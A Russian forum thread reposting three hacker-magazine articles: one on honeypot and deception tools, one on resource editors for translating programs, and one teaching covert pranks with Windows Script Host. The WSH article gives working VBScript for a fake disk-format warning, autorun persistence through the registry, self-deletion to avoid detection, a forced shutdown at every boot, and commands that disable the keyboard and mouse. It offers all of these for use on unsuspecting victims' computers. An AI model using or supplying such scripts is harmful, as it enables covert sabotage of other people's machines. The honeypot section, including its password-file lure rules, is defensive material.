Прочтя подшивку журнала ][, ты начал говорить непонятными словами: "Флудить, сканить, DoSить, нючить, дро..." Ну и пошлый же ты! Я имел ввиду "дропить" пакеты соседей по домашней локалке smile.gif. Но однажды, вкручивая очередной нимфе, какой ты крутой, и демонстрируя, как запросто ты серфишь по Сети, "случайно" заходя на порносайты и подводя свою подругу к очевидному для тебя выводу, твой комп падает в голубой экран. Значит, кто-то добрался и до тебя. Перегрузив комп, ты с удивлением обнаруживаешь, что твоя коллекция потрясающих картинок, которую ты полгода собирал с разных платников, безвозвратно потеряна. Ты вне себя от ярости и желаешь "жестоко отомстить". Но для этого тебе надо попытаться отследить своего визави. Как это сделать?

Можно поставить какой-нибудь firewall или систему обнаружения атак (например, обе этих системы объединены в BlackICE Defender или описываемом ниже RealSecure Server Sensor). Но... есть одна тонкость. Если твой противник умен, а недооценивать его я бы не стал, то он заспуфит свой адрес (как это делается, читай в этом же номере Х). Особенно, если он флудит или как-то по-иному DoS-ит тебя. Итак, тебе надо, с одной стороны, привлечь противника какой-нибудь целью, чтобы он потратил время на проникновение, а с другой - эта цель не должна быть реальной, т.е. не стоит использовать в качестве мишени свой компьютер или компьютер своего соседа по локалке. Какой отсюда следует вывод? Нужна приманка, о которой мы сейчас и поговорим.

Это ты о чем?

Смысл приманки, она же decoy, она же deception system (обманная система), она же honeypot (горшочек меда), один - завлечь противника, чтобы он стал тратить свое время и ресурсы на хак несуществующих или не имеющих реальной ценности ресурсов. Тем самым ты получаешь время на отслеживание визави, а при необходимости и на сбор следов его противоправной деятельности. Хотя вряд ли ты захочешь связываться с правоохранительными органами. Толку никакого, а мороки выше крыши. Кроме того, обманные системы могут сбить с толку нападающих, привыкших к широко известным средствам сетевой безопасности (firewall, IDS и т.д.).

Методы

Существует три часто применяемых варианта использования обмана в благих целях:

1. Сокрытие. Ты когда-нибудь использовал firewall в своей сетке? Если да, то тебе наверняка знакомо понятие "трансляция адресов" (network address translation). Если нет, то это когда одни адреса заменяются на другие. Например, адреса машин в твоей локалке меняются на один адрес firewall. Это и есть яркий пример обмана хакеров. Не зная твоего реального адреса, тебя очень трудно атаковать. Но и хакеры используют эту технологию не менее эффективно. Прокси-сервер - это тоже обман, но уже с другой стороны.

2. Камуфляж. Этот механизм используется не так часто, но он тоже скрывает в себе большую мощь. Например, подключаясь к FTP-серверу, твоему взору демонстрируется заголовок:

Connected to ftp.server.ru

220 ftp.server.ru Microsoft FTP Service (Version 4.0),

говорящий о том, что перед тобой мелкософтовский FTP-сервер под NT. А на самом деле на удаленном узле установлен Unix'овый сервак. Ты будешь тратить свои энергию и бабло на то, чтобы найти хоть одну дыру в FTP, удивляясь, "как это на мелкософте и нет дыр", а на самом деле хитрый админ просто сменил заголовок (banner), который появляется при подключении к серверу.

3. Дезинформация. С этим еще проще. Ты помещаешь на компьютер файлы с привлекательными названиями (например, passwd, admin.pwl или users.dat) и ждешь, когда ненасытные и злобные хакеры попытаются их украсть. Но ты не будешь им мешать. Ты-то знаешь, что в этих файлах нет реальных паролей и злоумышленник только потратит время зря, напуская на эти файлы утилиты типа Crack или L0phtCrack.


Что будем делать?

Так как первый класс средств широко известен и применяется в межсетевых экранах, то более подробно я коснусь второго и третьего. Большинство известных систем предназначено для выполнения следующих обманных действий:

1. Эмуляция несуществующих сервисов и портов. Такие системы устанавливаются на компьютер, который и является приманкой для хакеров. Примером такой системы является DTK.

2. Эмуляция несуществующих узлов сети. Такие системы устанавливаются на выделенные узлы, которые и имитируют целые виртуальные сегменты. Примером такой системы является CyberCop Sting.

3. Подмена баннеров. Такие системы зачастую являются расширением систем, эмулирующих несуществующие порты, и генерят баннеры, похожие на настоящие. Примером такой системы является RealSecure Server Sensor.

Попробуй с помощью любого сканера провести сканирование какой-либо машины в сети. В зависимости от решаемых задач, число открытых портов на таких машинах может быть разное, но обычно оно не превышает 30-50 (для серверов) и 5-10 (для рабочих станций). Для хостов Unix число открытых портов несколько больше, но не намного. Если с помощью обманной системы число открытых портов увеличивается в 10 раз, то и число действий, которые должен выполнить хакер, также возрастает как минимум на порядок. Даже использование сканеров не сильно облегчает задачу, т.к. они вводятся в заблуждение так же, как и человек. Создаваемые сканерами безопасности отчеты не смогут помочь злоумышленнику определить, какие из открытых портов являются реальными, а какие нет. Тем самым злоумышленнику придется тратить время и ресурсы на ручную проверку всех обнаруженных портов и присущих им уязвимостей, что позволит своевременно обнаружить такие попытки и противопоставить им эффективные средства защиты, и, возможно, обнаружить злоумышленника (хотя обольщаться этим не стоит).

The Deception Toolkit и другие перлы

DTK является одним из известных обманных средств. Этот комплект (http://all.net) представляет собой набор программ на языке Perl, реализующих описанные выше механизмы обмана кульных хацкеров. По заявлению автора DTK - Фреда Коэна, этот комплект утилит может функционировать под управлением любой сетевой операционной системы, но широкое применение он получил на платформе Unix (хотя теоретически будет работать и под Windows с ActivePerl). Как и другие *nix'овые утилиты, DTK настраивается из командной строки путем изменения соответствующих файлов. Обычно вся настройка ограничивается созданием ответных реакций на действия нападающих. Например, вот так выглядит файл *.response, отвечающий за эмуляцию почтовой программы sendmail 8.1.2/8.1.3:

# State Input NexStat Exit lf/file output/filename

# comment lines start with the pound sign (#)

# we are faking sendmail version 8.1.2/8.1.3

0 START 0 1 1 220 all.net ESMTP Sendmail 8.1.2/8.1.3;

0 ERROR 0 1 1 500 Command unrecognized - please say "Helo"

0 help 0 1 1 214-No help available

# if they say helo, we acknowledge and go to state 2

0 helo 1 1 1 250 all.net, pleased to meet you

0 quit 0 0 1 221 all.net closing connection

# if you don't get anything - just ignore it and wait

0 nil 0 1 0

# we got a Helo request

# it contained something with /etc/passwd in it - let's simulate a big hole

1 ! 4 1 2 /etc/passwd @fake.passwd

# this regular expression matched something in the input line - let's simulate a big hole

1 /cat\spasswd/ 4 1 2 @fake.passwd

1 mail 2 1 1 250 proceed

1 rcpt 1 1 1 500 Must say "HELO" first

1 help 1 1 1 214-No help available

1 quit 1 0 1 221 all.net closing connection

1 nil 1 1 0

1 ERROR 1 0 1 500 Server Configuration Error - all.net closing connection

# even a rcpt - this guy's good!!!

2 rcpt 3 1 1 250 proceed end with a '.'

2 help 2 1 1 214-No help available.

2 quit 2 0 1 221 all.net closing connection

2 nil 2 1 0

2 ERROR 2 0 1 500 Server Configuration Error - all.net closing connection

# getting mail - what do I do?!?!?

3 nil 1 1 1 500 Mailbox full - please start again

3 ERROR 3 0 0 500 Server Configuration Error - all.net closing connection

# I sent them a password file - better notify the authorities

4 NOTICE notify.pl Email fc@all.net Just sent a password file to an attacker - sendmail exploit

4 NIL 0 1 1 214-Unknown configuration error

4 ERROR 0 0 0 500 Server Configuration Error - all.net closing connection

Как и любая другая нормальная система защита, DTK ведет свой собственный лог, в котором сохраняются все попытки проникновения. Например, вот как выглядит попытка утянуть файл паролей через Telnet-соединение:

127.0.0.1 23 23 1998/04/02 05:34:23 8041 8041:1 listen.pl S0

- - - +3 - - 8041:1 - S1 root

- - - +1 - - 8041:1 - S2 toor

- - - +2 - - 8041:1 - S3 ls

- - - +2 - - 8041:1 - S3 df

- - - +4 - - 8041:1 - S3 cat /etc/passwd

- - - +0 - - 8041:1 - S4 NOTICE //dtk/notify.pl 23 4 Email fc@all.net Just sent a password file to an attacker - telnet login

Необходимо заметить, что DTK - это абсолютно бесплатный продукт, который можно скачать по адресу: http://all.net/dtk/dtk.tar. Развивая пакет DTK, автор разработал улучшенную, но не бесплатную версию - DTK-Pro, которая, реализуя все возможности DTK, дополняет его новыми механизмами:

* Централизованное управление несколькими DTK, установленными на разных узлах сети.

* Графический интерфейс администратора DTK-Pro.

* Проверка согласованности задаваемых обманных правил.


На базе Perl построены и другие, более простые обманные системы. Например, WinDog Deception Toolkit, которая в стандартной поставке позволяет эмулировать тот же Sendmail и Telnet. Данный пакет, в отличие от DTK, изначально разрабатывался для Windows и тестировался на совместимость с ActivePerl. Пример подмены сервиса Telnet (исключая коммуникационную часть) Unix SVR4 показан ниже:

#!/usr/bin/perl

use Socket;

$port=23;

$login="\n\rlogin:";

$password="password:";

$banner="\n\r\n\rUnix® System V Release 4.0 (brooder)\n\r";

$fail="login incorrect.\n\r";


#

#Здесь идет коммуникационная часть (работа с сокетами и т.д.)

($af,$port,$inetaddr)=unpack($sockaddr,$addr);

@inetaddr=unpack('C4',$inetaddr);

($i1,$i2,$i3,$i4)=@inetaddr;

$ipaddr="$i1.$i2.$i3.$i4";

print "connected from $ipaddr\n";

print NS $banner;

print NS $login;

while() {

print "attempt to log in as $_\n";

print NS "$password";

$ll= || last;

sleep 5;

print "tried password $ll. Login incorrect is given\n";

print NS $fail;

print NS $login;

}

print "$ipaddr disconnected\n";

close(NS);

CyberCop Sting

Система CyberCop Sting, разработанная в компании Network Associates (http://www.nai.com), в отличие от DTK или WinDog-DTK, эмулирует не отдельные порты или сервисы, а целые Ethernet-сегменты, состоящие из маршрутизаторов Cisco (правда, устаревшей версии IOS 11.2), серверов Windows NT 4.0 и даже Solaris 2.6. Все атаки на виртуальные хосты регистрируются, что позволяет своевременно начать расследование инцидента и отслеживание злоумышленника.

Само "жало" функционирует как обычный NT-сервис, который настраивается путем изменения конфигурационных файлов (фрагмент такого файла см. ниже) в обычном текстовом редакторе.

node Virtual_Cisco_host_1 {

node-type CISCO

next-hop core.e0

iface e0 {

address 200.0.0.193/255.255.255.0

}

iface e1 {

address 200.0.0.194/255.255.255.0

}

}

node Virtual_Solaris_host_1 {

node-type SOLARIS

next-hop core.e0

iface e0 {

address 200.0.0.200/255.255.255.0

}

}

node Virtual_NT_host_2 {

node-type NT

next-hop Virtual_Cisco_host_1.e1

iface e0 {

address 200.0.0.201/255.255.255.0

}

}

Sting можно настроить и таким образом, чтобы виртуальный узел ретранслировал получаемые пакеты на вполне реальный, но невидимый для злоумышленника адрес, который и отвечает на все несанкционированные запросы. Таким образом, несуществующий узел выступает в роли прослойки между реальным и атакующим узлом. Хорошо, если бы CyberCop Sting умел бы эмулировать не только несуществующие узлы, но и отдельные порты и сервисы на этих узлах, еще больше затрудняя работу хакера. Но пока это не реализовано и неизвестно, дойдут ли до этого когда-нибудь у разработчиков руки.

RealSecure Server Sensor

Этот продукт трудно назвать обманной системой, т.к. Decoy-режим, реализованный в Server Sensor, является лишь небольшой частью тех возможностей, которые заложили в него разработчики. Кстати, разработана эта система компанией Internet Security Systems, которая известна своими сканерами Internet Scanner, System Scanner и Database Scanner и системой обнаружения атак на уровне сети RealSecure Network Sensor, которые уже упоминались на страницах ][. Еще мне понравилось то, что эта система, единственная из многих, поддерживается в России
(www.infosec.ru/ produkt/adapt/real_secure/real_sec.html). Да еще и обучение по ней можно пройти в России с выдачей соответствующей бумажки, признаваемой во всем мире. Пустячок, а приятно.

В отличие от уже названных систем, RealSecure Server Sensor функционирует как сервис (или демон) на Windows NT, Windows 2000, Linux, Solaris, HP UX и AIX и управляется централизованно с одной консоли (NT или W2k). Соответственно и настройка обманного режима (см. рисунок) осуществляется не из командной строки, а при помощи графического интерфейса.


Как видно из рисунка, в системе уже предопределен ряд сервисов, которые могут эмулироваться. Но и создать новые правила для любого из 65535 возможных сервисов не составляет большого труда. Для каждого из созданных правил возможно использование любого из вариантов реагирования, начиная от регистрации в базе данных и уведомления админа по e-mail или через SNMP и заканчивая созданием своих баннеров и обработчиков событий.

Заключение

Итак, для чего тебе может понадобиться любая из обманных систем, описанных в этой статье:

* для увеличения числа выполняемых нарушителем операций и действий;

* для получения возможности отследить нападающих.

Применение обманных систем - это достаточно интересный и, при правильном применении, эффективный метод обеспечения сетевой безопасности не только целых сетей, но и обычных домашних компьютеров. Однако для большей эффективности можно порекомендовать использовать связку защитных средств "обманная система - система обнаружения атак", которая позволит не только обнаружить нападающего сразу же после первой попытки атаки, но и заманить его при помощи обманной системы, тем самым давая время на обнаружение злоумышленника и принятие соответствующих мер.

Но не стоит забывать, что обманные системы - это не панацея от всех бед. Они помогают в случае простых нападений, осуществляемых начинающими или неопытными злоумышленниками (script kiddies). В случае квалифицированных и опытных нарушителей обманные системы теряют свою эффективность. Предварительный анализ трафика позволяет злоумышленнику понять, какие из обнаруженных портов фиктивные. Моделирование атак на стенде и сравнивание результатов с тем, что выдается в реальной атакуемой системе, также позволяет обнаружить использование обманных средств. Мало того, неправильная конфигурация обманной системы приведет к тому, что злоумышленник сможет обнаружить факт слежки за ним и прекратит свою несанкционированную деятельность. Однако число действительно квалифицированных злоумышленников не так велико, и поэтому использование обманных средств может помочь в большинстве случаев.





Автор: Metallica Dec 19 2006, 16:06

WSH - лучшее средство компьютерного западлостроителя




Как только я не изгалялся тогда над несчастными, но злобными информатичками, тупорогими админами в компьютерных клубах, ламернутыми друганами и т.д. В этом отношении мне больше всего нравилась «Панель управления», с ее помощью можно быстро и легко совершить мерзкое компьютерное западло, например, поменять клавиши мыши местами (Панель управления -> Мышь), для чего достаточно установить переключатель конфигурации кнопок «Для левши» и/или отключить двойное нажатие, для этого нужно просто передвинуть бегунок скорости двойного нажатия в положение Выше. А можно отключить (почти!) клавиатуру (Панель управления -> Специальные возможности), для этого установи флажок напротив слово «Фильтрация» и нажми рядом кнопку «Настройка...», далее сними все флажки, которые там увидишь, а переключатель установи в положение «Игнорировать краткие нажатия», «замедлить повтор» и снова нажми «Настройка...», там воткни переключатель на «Нет повторов при удержании клавиш», а рычажок «Удержание нажатой клавиши для приема ввода» - в положение «Долгое», затем закрой все окна кнопками ОК, не забудь нажать «Применить». Вообще-то, после этого клавиатура будет работать, но придется по полчаса ждать срабатывания клавиш. А теперь представь, как весело будет работаться на компьютере, если проделать все вышесказанное smile.gif. И это далеко не все приколы «Панели управления», а ведь есть еще немало забавных системных файлов: system.ini, win.ini, msdos.sys, autoexec.bat, config.sys, реестр наконец, - туда я тоже любил запускать свои шаловливые ручонки. И я уж совсем молчу о банальном перемещении, переименовании, удалении файлов. Но во всем этом я быстро разочаровался, т.к. после такого западла трудно было избежать вражеского преследования.


Начинаю думать головой

Как правило, после моего ухода начинались паника и крики, типа: «Кто сидел за этим компьютером и весь его высидел?!!». Меня вычисляли, били по шее, пинали в поддых и в пах, после чего приходилось все восстанавливать sad.gif. Как ты понимаешь, это не есть кул! В итоге я понял, что хватит ходить в гипсе smile.gif, а пора заняться хакерским западлом, т.е. таким, чтобы нельзя было определить, кто и, желательно, как его сделал. Но каким образом? Конечно, можно было бы использовать какую-нибудь заподлянскую программку типа «Месть 56», но таскать ее все время с собой в лом. А если, к тому же, вражеский комп не имеет ни дисковода, ни сидюка и ко всему прочему не подключен к сети (бывает и такое)? Конечно, если на таком компе будет установлен хотя бы один язык программирования, то задача упростится - можно написать заподлянскую программку прямо на самом компьютере жертвы. А если нет? Вообще-то, есть еще возможность воспользоваться VBA из MS Office, но часто бывает, что и Офис не установлен (особенно это касается компьютерных клубов). Короче говоря, понятно, что должна иметься возможность совершить хакерское западло во всех жизненных ситуациях. И тогда я снова обратился к Windows - нутром почувствовал, что не может Мокрософт не позаботиться о нашем брате западлостроителе. И оказался прав...

Знакомство с WSH

Обратил я внимание на краткие упоминания от самой M$ о неком Сервере сценариев Windows (Windows Scripting Host). Когда я копнул поглубже, то понял, что вот он... вот он, предмет моих недолгих поисков! Суди сам:

- WSH стандартно входит в следующие операционки: Win 95OSR2/98/2k/Me/XP (к сожалению, в Win 95 и NT сервер сценариев отсутствует, но эти оси уже отживают свой век, а WSH активно развивается и стопроцентно будет использоваться во всех последующих Виндозах);

- WSH поддерживает языки сценариев VBScript и JScript, а также имеет возможность подключения любых других языков, например, таких, как Perl или Python (но для нас это не важно);

- WSH обладает практически неограниченными возможностями по работе с файлами, реестром, сетью и т.д.;

- для создания скриптов не требуется компиляторов и специальной среды программирования, достаточно простого текстового редактора, например, Блокнота (Notepad);

- для запуска сценариев требуется совсем немного памяти, а сами размеры сценариев могут быть практически любого размера (десятки тысяч строк).

Короче, теперь я откровенно заявляю, что не просто Windows, а именно WSH - лучшее средство компьютерного западлостроителя. И уверен, ты со мной согласишься.

Ладно, хватит тянуть пса за хвост - пора продемонстрировать тебе возможности этой рулезной фичи. Сразу скажу, что все примеры я буду приводить на VBScript в среде Windows 98 SE, т.к., на мой взгляд, VBS гораздо удобнее и имеет больше возможностей, чем JScript, а Win 98 - самая юзаемая до сих пор ось в мире (и что бы мне ни говорили!). Для тех, кто на самосвале, хочу заметить, что JScript - это совсем не JavaScript, а некая созданная Microsoft пародия на него. И еще - я не собираюсь давать тебе уроки WSH и VBS, т.к. в одной статье это просто невозможно, - моя задача заинтересовать тебя, продемонстрировать возможности, а изучить это дело ты сможешь и без меня, тем более что VBS учится практически на одном дыхании. Для начинающих хочу посоветовать на эту тему отличный сайт www.scripting.vlink.ru. Но можешь, конечно, и ничего не читать, а просто, как обезьяна с гранатой, использовать приведенные примеры.


Первый примерчик

Итак, начнем с простого, создадим загадочную мессагу, для этого откроем Блокнот (на компе жертвы smile.gif) и набьем следующее:

Hacker = MsgBox("Windows установила, что вы используете пиратскую версию системы. Windows обязана отформатировать жесткий диск. Да - произвести форматирование немедленно. Нет - сделать это перед окончанием работы системы.", 20, "System error")

Сохрани этот рулез с расширением .vbs в укромное местечко (например, в папку Windows\System) и дважды щелкни на значке полученного файла, ты должен увидеть следующее:

А теперь представь ламака, который увидит эту мессагу, как он дрожащей рукой нажмет кнопку Нет и как после этого будет сохранять все важные данные на дискеты. Весело! Одна только проблемка: «Как заставить жертву запустить этот файл?» Конечно, можно поместить наш файл в Автозагрузку (StartUp), но надежнее будет в реестр: Пуск -> Выполнить->regedit, раскрой ветвь HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, затем меню Правка (Edit) -> Создать (New) -> Строковой параметр (String Value) и введи StartUp Script. Дважды щелкни на новом параметре и введи путь к нашей мессаге (например, C:\Windows\System\message.vbs) и щелкни OK. Теперь наше западло будет выполняться для каждого юзера системы, и не всякое ламо сможет его обнаружить.

Конечно, это все замечательно, но после первой же перезагрузки компа мессага всплывет, и особо подозрительная жертва может почуять неладное. Поэтому сделаем так, чтобы западло давало о себе знать только, допустим, через 5 дней. Смотрим сегодняшнее число, например, это 19, и добавляем две строки, соответственно в начало и конец нашего скрипта:

if Day(now)>24 Then

....

End If

Теперь сообщение впервые появится только после двадцать четвертого числа. За это время жертва уже забудет о твоем приходе, и, стало быть, ты обеспечишь себе практически железное алиби.

Теперь логичным было бы добавить строки, которые, как и сказано в мессаге, отформатировали бы винт, но я против таких методов. Я придерживаюсь принципа, что в западле должна иметься возможность все вернуть в исходное состояние. Поэтому в нашем случае будет достаточно легкого испуга жертвы (но ты, конечно, можешь это исправить!). А сейчас сделаем так, чтобы наша прога заметала все свои следы, т.е. самоуничтожалась и вычищала о себе запись в реестре. Это необходимо обязательно сделать, иначе, после того как обещанного форматирования не произойдет, ламак заподозрит неладное и, если у него хватит таланта, может наткнуться на наш скрипт, а затем выйти и на нас. Короче, добавляем следующие строки для удаления нашего файла:

Set Killer=CreateObject("Scripting.FileSystemObject")

Killer.DeleteFile("c:\Windows\System\message.vbs")

и для удаления записи в реестре:

Set WSHShell=WScript.CreateObject("WScript.Shell")

WSHShell.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StartUp Script"

На скриншоте показано, как должен выглядеть готовый скрипт:

Теперь мессага появится один-единственный раз (после 24 числа) и исчезнет из системы навсегда - пусть ламо думает, что это глюканула винда или он сам smile.gif). Вот такое получилось простенькое, но нестандартное Хакерское западло.


Второй примерчик

Если тебе этого мало, то вот еще текст западла, отрубающего комп (также срабатывающего после 24 числа):

If Day(now)>24 Then

Sub Zapadlo(Fuck, Wait)

Set WshShell=WScript.CreateObject("WScript.Shell")

X=WshShell.Run(Fuck,Wait)

End Sub

Call Zapadlo("rundll32 shell32,SHExitWindowsEx -1", True)

End If

Помести это, как и в первом примере, в реестр, и сразу же после загрузки комп будет вырубаться smile.gif.

Наверное, ты заметил, что в кавычках инструкции Call указана одна из команд Windows 9x, которую можно просто ввести в поле Выполнить (Run). Если ты, например, поместишь в программу строку: Call Zapadlo("c:\windows\calc.exe", True), то будет запускаться калькулятор.

Для тех, кто «далек от мысли», привожу список еще некоторых интересных команд:

rundll32 keyboard,disable - отключить клавиатуру;

rundll32 mouse,disable - отключить мышь;

rundll32 user,swapmousebutton - поменять местами клавиши мыши;

rundll32 user,disableoemlayer - спровоцировать сбой (обрати внимание!);

rundll32 shell32,SHExitWindowsEx 0 - завершить работу текущего пользователя;

rundll32 krnl386.exe,exitkernel - выход из Windows без любых сообщений/вопросов;

rundll32 shell32,ShellAboutA Info-Box - показать окно About Windows.

Кстати, инструкций Call в последнем скрипте можно вставлять бесчисленное множество, поэтому, например, можешь одновременно отрубить мышь и клавиатуру - здесь все зависит от твоей фанты.


Кончаю

Ну все, хватит гонять - думаю, я тебя уже достаточно заинтересовал, пора бы и делом заняться wink.gif. Напоследок дам тебе совет: никогда не показывай потенциальной жертве, что ты отлично волокешь в компах, - строй из себя конченного ламера (как с недавних пор делаю я) - по пять минут ищи нужную кнопку на клаве, с третьей попытки попадай указателем мыши в ярлык и т. п. (не мне тебя учить). Тогда ты точно останешься живым и здоровым и не придется пришивать оторванные руки и прикручивать на место открученную голову smile.gif.

Удачи тебе в нелегком и экстремальном компьютерном западлостроительстве!

З.Ы. Блин, что я наделал... бедные учителя информатики...

Автор: Metallica Dec 23 2006, 18:29

Руcификация своими руками

Хотелось бы тебе покопаться в интересной программе? Выяснить, как она выглядит изнутри, выдрать из нее красивые значки и картинки или вообще изменить ее внутренний интерфейс? Но для полноценной работы нужны исходники, нужно знать основы программирования... Вообще, нужно изучать очень много вещей, на которые совершенно нет времени. К тому же 80% разработчиков не подозревают о существовании «великого и могучего», а от английского интерфейса начинает тошнить... Есть довольно простой способ изменить если не принципы работы программы, но уж ее внешний вид точно.

Пролог

В феврале 2000 года из Х я узнал о существовании программы Restorator. Хотя нет, скачал я ее еще пару месяцев назад, но не врубился, что она делает. На сайте автора было написано про exciting world of UCA's - User-styled Custom Applications, но это ничего не объясняло. А маленький абзац в Х все прояснил - это программа для переделки других программ. На самом деле все довольно просто. В любой программе есть место, где в довольно упорядоченном виде хранятся почти все данные ее внешнего вида. И эти данные можно легко изменить, не обладая никакими основами программирования и не имея исходных кодов. Программы, которые могут изменять эти данные, относятся к классу редакторов ресурсов. За прошедшие полтора года этот класс довольно сильно разросся на волне популярности Restorator-а, появился даже один отечественный представитель.

Теория

Для начала немного теории, а потом я опишу известные мне редакторы ресурсов. Ресурсы чаще всего находятся в exe файлах, реже в dll, а вообще их можно найти везде - вплоть до файлов с экранными заставками (scr). Почти независимо от того, в чем сделана интересующая нас программа, они разделены по разным разделам/папкам. Все примеры я будут давать на базе программы Restorator, она обладает почти самым большим количеством возможностей и довольно проста в освоении.

Скачиваем, запускаем и видим три окна - «resource tree» - в нем показывается открытый файл со всем его ресурсами в виде раскрывающихся папок; внизу висит содержимое рабочей папки, куда будут извлекаться ресурсы и откуда они будут добавляться. Справа есть окно resource viewer, где будет отображаться содержимое открытого ресурса. В качестве примера возьмем всем известный блокнот, надеюсь, он у тебя есть. Открываем в рестораторе notepad.exe - и что мы видим? А видим мы несколько папок - Menu, Dialog, String, Accelerators, Icon, Version. Некоторым людям, всю жизнь не вылезающим из танка, эти названия ничего не говорят, но нам-то ясно, что в папке Menu находятся стандартные меню, в папке Dialog содержаться окна диалогов. В папке String находятся текстовые отрезки, вставляемые в разные места программы, в Accelerators находится список сочетаний кнопок, который проставляется в меню. Так, что там еще осталось? Папка Icon содержит значки, а Version - информацию о версии программы. Так как блокнот не слишком продвинутая программа, в ней отсутствуют разделы с картинками - Bitmap, с видео - AVI, с функциями - Typelib. В программах, написанных на Delphi, есть еще раздел RCData. Некоторые типы данных - Menu, Dialog, String, Accelerators и RCData - можно редактировать во встроенном редакторе. Почти все типы данных, кроме version, можно извлечь и редактировать в других программах. А потом вставить обратно. То есть можно изменить все картинки программы, все видеовставки. Например, в Windows вместо перелетающего листочка можно поставить летающий кирпич, если у тебя настолько прямые руки, что могут редактировать видео. Все видеофайлы хранятся в формате Avi, а картинки чаще всего в Bmp, 256 цветов. Курсоры, иконки - все можно заменить. Нельзя изменить только информацию о версии программы, которая содержится в разделе Version. По мнению автора программы - изменение данных о версии может внести путаницу. Во время редактирования меню и диалогов все изменения автоматически будут отображаться в окне предварительного просмотра, что существенно облегчает задачу. Внизу каждого изменяемого файла будет несколько закомментированных строк. В нем довольно подробно, но по-английски, будет написано, что можно сделать с данным кодом. Теоретически, осмыслив эти комментарии, можно разобраться во всем, не читая данную статью.

Проблемы

Любое дело, кроме самого примитивного, содержит большую кучу проблем. И здесь нас не минует сия чаша.

Проблема номер 1: Тип RCData содержит в себе одновременно и текст, и всю графику данного окна. С ним неудобно работать, серия Виндов 9х не может отобразить для редактирования очень большие куски текста. Попробуй, например, открыть в блокноте файл размером в мегабайт. Облом, да? И встроенный редактор Restorator-а также обломает. Конечно, можно все это извлечь, получив кучу рисунков и один txt файл. Но не факт, что это все запихнется обратно. Самым лучшим выходом является переход на Win NT/2K/XP, если ты этого еще не сделал.

Проблема номер 2: Часто разработчики, наплодив громадных размеров исполняемый файл или озабоченные неприкосновенностью своего детища, сжимают его до совершенно непотребных размеров. Например, небезызвестный Winboost обладает exe файлом весом в 7 метров. После сжатия он уменьшается в 10 раз, вот только редактировать ресурсы в нем нельзя. При открытии таких файлов Restorator выдает надпись о поврежденных ресурсах. Эта проблема отчасти разрешима, причем в два этапа. Этап первый - находим программы для анализа файлов и выясняем, чем они сжаты. Этап второй - находим, чем файлы можно разжать, и разжимаем. Облом может наступить на любом этапе - или что-то не анализируется, или не разжимается, или разжатое не работает. Не работать может по двум причинам - либо сжимали по максимуму и ничего восстановить нельзя, либо разжатый файл поврежден. Тогда можно сделать такой финт ушами - загрузить в каком-нибудь редакторе ресурсов и сохранить. Очень помогает в таком случае Alchemy CATALYST.

Проблема номер 3: В исполняемом файле нет никаких ресурсов или там какая-то фигня. Где тогда искать? Можно открывать по очереди все самые большие файлы в папке с программой. Можно посмотреть, что во время установки программы устанавливалось в системные папки windows. Можно посмотреть, к каким файлам обращается программа во время запуска. Можно «програбить» всю папку с программой на наличие текстовых ресурсов, а потом поискать в результатах какую-нибудь сложную фразу из программы и выяснить, откуда она выдрана.

Проблема номер 4: Программа проверяет свою идентичность во время запуска. Тут надо искать кряк, который снимает эту защиту, или сделать его самому.

А как сразу получить результат?

Специально для тех, кто испугался всех трудностей и хочет получить результат, ни фига не делая. К счастью, в Рунете еще полно ненормальных, типа меня, которые готовы бесплатно поделиться результатами своих трудов. Допустим, позарез захотелось увидеть программу XXX на русском языке. Как можно изменить ее интерфейс? Вариантов целых три:

Если разработчики программы ХХХ умные предусмотрительные люди, они подозревают о наличии в мире других языков. Они делают в своей программе возможность смены языков. Чаще всего все данные о новом языке интерфейса содержатся в специальном файле, который я называю «языковой модуль». Надо разыскать в сети такой файл на нужном языке и подсунуть его программе. Чаще всего он подходит к разным версиям программы.

Если возможности легально изменить язык интерфейса нет, придется воспользоваться специальными патчами, которые заменят часть ресурсов программы на немного измененные. Название этих патчей - русификаторы. (К сожалению, у этого слова есть еще несколько значений, так что не запутайтесь.)

Третий вариант экзотический, для настоящих извращенцев. В мире существует уникальная программа, которая может «на лету» заменять английский интерфейс на русский. Называется это убожество LingoWare. Работает оно по словарю, который существует пока только для одной программы - ICQ. Это настоящий монстр. Требует денег, обладает жутким интерфейсом с поддержкой скинов, отжирает кучу памяти и заметно тормозит работу компьютера.

Вооружаемся

Теперь, когда все ламеры, испуганные теорией и проблемами, сбежали, начинаем вооружаться. Первым делом идут программы для изменения ресурсов.

Restorator. Самая известная программа. Обладает довольно понятным интерфейсом. Довольно подробное описание работы, справка и комментарии. Очень много интересной информации есть на сайте. Может "грабить" файлы и папки на наличие ресурсов. Зарегистрированная версия может создавать патчи, то есть автономные программы, которые будут вносить все изменения в ресурсы, которые ты сделал. Может отобразить почти все виды ресурсов. Из недостатков - небольшая глючность. Иногда виснет. Иногда отрубаются сочетания кнопок. Не идеальный поиск (в результате указывается только ресурс, содержащий результат). Медленно выходят новые версии. Нет визуального редактирования диалогов. Небольшой прикольный баг: предыдущая версия (2.50) могла зарегистрироваться без ввода регистрационного кода.

Resource Hacker. Очень неплохая программа. Идеально дополняет ресторатор. Быстрая. Интерфейс простой. Нормальный поиск. Может редактировать HEX.
Passolo. Для оперирования с файлами использует проекты, где записано, какие файлы, ресурсы и установки использовать с данной программой. Можно создавать словари с переводами слов, которые будут подставляться автоматически. Перед редактированием создается список текстовых фраз, который потом надо изменять. Но обычный тип, через дерево ресурсов все же есть.

Visual Localize. Программа похожа на Passolo, только более неудобный, но оригинальный интерфейс. Тоже используются проекты, тоже есть словари, так же создается список текстовых надписей. Большим плюсом является мощная система замены по шаблону и навороченная система просмотра. Без регистрации не дает изменять весь файл.

Alchemy CATALYST. Довольно продвинутая программа. Визуальный редактор. Подсчет букв в изменяемом сочетании. Редактирование ведется в двойном окне, где сразу показывается измененный вариант и оригинал. Без регистрации дает изменить только 10% от файла.

Resource Tuner. Обладает интерфейсом в стиле XP и прикольной текстовой строкой. Подключаются плагины. Без регистрации работает 30 дней.

ExeScope. Раньше это была довольно неплохая программа, но всеми ее достоинствами обладает Resource Hacker, а глюков у нее куча.

Есть еще старые и малоэффективные программы от крупных фирм. Например, Resource Workshop от Borland и ResourceStudio от Symantec.

Программы для анализа сжатых файлов. Так как это программы из арсенала хакеров, найти их в сети иногда довольно сложно. Почти все они заброшены довольно давно и не обновляются.

PE-Sniffer. Единственная Win программа. Анализирует файлы на наличие признаков самых распространенных программ для сжатия/защиты. Может определить компилятор.

File Analyzer, File Information, File Scanner. Все они работают из-под DOS. Выводят кучу информации, среди которой может быть то, что нам нужно.

